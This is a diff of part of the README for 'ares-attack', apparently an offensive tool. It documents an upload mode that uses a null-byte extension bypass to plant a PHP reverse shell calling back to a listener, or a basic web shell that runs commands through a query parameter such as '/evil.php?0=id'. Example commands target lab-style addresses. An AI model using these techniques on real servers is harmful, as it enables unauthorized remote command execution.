Komodo-pty/ares-attack/README.md

 	-a <EXTENSION>: Allowed extension to use with Null Byte (defaults to jpg).
 Enter the extension without a period prepended.
 	-b: Basic payload instead of a Reverse Shell.
 Provide commands as the value of the 0 parameter (e.g. /evil.php?0=id) .
 Incompatible with -e

-[Example Usage]
-	ares -m upload -i 12.345.67.89 -p 1337 -u http://10.10.40.117/panel/ -n fileUpload -e http://10.10.40.117/uploads/ -a png ares -m upload -u http://10.10.40.117/panel/ -n fileUpload -b

 [Supported File Types]

-Currently, Uploader only supports PHP files.
+    Uploader only supports PHP files.
 More file types will be added in subsequent updates.

+[Usage]
+	ares -m upload -i 12.345.67.89 -p 1337 -u http://10.10.40.117/panel/ -n fileUpload -e http://10.10.40.117/uploads/ -a png ares -m upload -u http://10.10.40.117/panel/ -n fileUpload -b
 ```

 ### Roasting